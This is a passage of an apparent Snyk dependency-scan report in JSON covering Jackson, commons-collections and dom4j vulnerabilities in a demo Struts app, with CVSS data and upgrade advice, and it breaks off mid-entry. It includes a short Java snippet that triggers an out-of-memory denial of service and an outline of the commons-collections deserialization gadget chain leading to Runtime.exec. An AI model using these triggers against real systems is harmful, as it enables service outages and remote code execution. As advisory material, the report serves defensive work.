[Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19360" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-f9hv-mg5h-xcw9" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:23.673097Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:44Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:34.457712Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.110184Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:51:22.091904Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.548577Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.110184Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:22.091904Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19361`) is not identical to `CVE-2018-19362` and `CVE-2018-19360`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19361" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mx9v-gmh4-mgqw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:31.715185Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:43Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:22.091904Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Alessio Soldano" + ], + "semver": { + "vulnerable": [ + "[,2.8.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.8.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/UTF8StreamJsonParser.java", + "className": "UTF8StreamJsonParser", + "functionName": "_reportInvalidToken" + } + }, + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/ReaderBasedJsonParser.java", + "className": "ReaderBasedJsonParser", + "functionName": "_reportInvalidToken" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-core", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-core/pull/322", + "title": "GitHub PR" + }, + { + "url": "https://issues.jboss.org/browse/JBEAP-6316", + "title": "Jira Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:01.546686Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). If the REST endpoint consumes POST requests with JSON or XML data and data are invalid, the first unrecognized token is printed to server.log\r\n> If the first token is word of length 10MB, the whole word is printed. This is potentially dangerous and can be used to attack the server by filling the disk with logs.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.8.6 or higher.\n## References\n- [GitHub PR](https://github.com/FasterXML/jackson-core/pull/322)\n- [Jira Issue](https://issues.jboss.org/browse/JBEAP-6316)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-399" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-core", + "proprietary": false, + "creationTime": "2017-09-20T15:28:35.195000Z", + "functions_new": [ + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.UTF8StreamJsonParser", + "functionName": "_reportInvalidToken" + } + }, + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.ReaderBasedJsonParser", + "functionName": "_reportInvalidToken" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-01-12T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-core" + }, + "publicationTime": "2017-09-20T15:28:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:58:01.546686Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-core@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-core", + "version": "2.6.5", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "gmethwin@github" + ], + "semver": { + "vulnerable": [ + "[2.3.0-rc1,2.7.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/UTF8JsonGenerator.java", + "className": "UTF8JsonGenerator", + "functionName": "writeNumber" + } + }, + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/WriterBasedJsonGenerator.java", + "className": "WriterBasedJsonGenerator", + "functionName": "writeNumber" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-core", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-core/issues/315", + "title": "GitHub Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:48.004490Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). When `WRITE_BIGDECIMAL_AS_PLAIN` setting is enabled, Jackson will attempt to write out the whole number, no matter how large the exponent.\r\nThe following sample code will trigger an out of memory exception:\r\n```java\r\nObjectMapper mapper = new ObjectMapper().enable(JsonGenerator.Feature.WRITE_BIGDECIMAL_AS_PLAIN);\r\nmapper.writeValueAsString(new java.math.BigDecimal(\"9.223372E+1010671858\"));\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.7.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be)\n- [GitHub Issue](https://github.com/FasterXML/jackson-core/issues/315)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-399" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-core", + "proprietary": false, + "creationTime": "2017-09-20T15:28:35.195000Z", + "functions_new": [ + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.UTF8JsonGenerator", + "functionName": "writeNumber" + } + }, + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.WriterBasedJsonGenerator", + "functionName": "writeNumber" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2016-08-25T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-core" + }, + "publicationTime": "2017-09-20T15:28:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:55:48.004490Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-core@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-core", + "version": "2.6.5", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,3.2.2)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.6, + "functions": [ + { + "version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", + "className": "InvokerTransformer", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/commons-collections/pull/18", + "title": "GitHub PR" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:34.698666Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "description": "## Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n", + "epssDetails": { + "percentile": "0.82603", + "probability": "0.00880", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-6420" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6hgm-866r-3cjv" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2019-10-10T18:31:03.943542Z", + "functions_new": [ + { + "version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "className": "org.apache.commons.collections.functors.InvokerTransformer", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-10T00:00:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2020-02-24T00:00:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:35.761152Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "commons-collections:commons-collections", + "version": "3.1", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-DOM4J-174153", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "credit": [ + "Mario Areias" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/Namespace.java", + "className": "Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/QName.java", + "className": "QName", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/dom4j/dom4j/issues/48", + "title": "GitHub Issue" + }, + { + "url": "https://ihacktoprotect.com/post/dom4j-xml-injection/", + "title": "POC: Ihacktoprotect Blog" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:00:55.789489Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "type": "secondary", + "vector": 